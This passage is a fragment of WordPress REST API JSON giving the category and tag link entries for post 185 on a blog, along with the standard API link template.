:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/blog.which778.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=185"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/blog.which778.cn\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=185"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}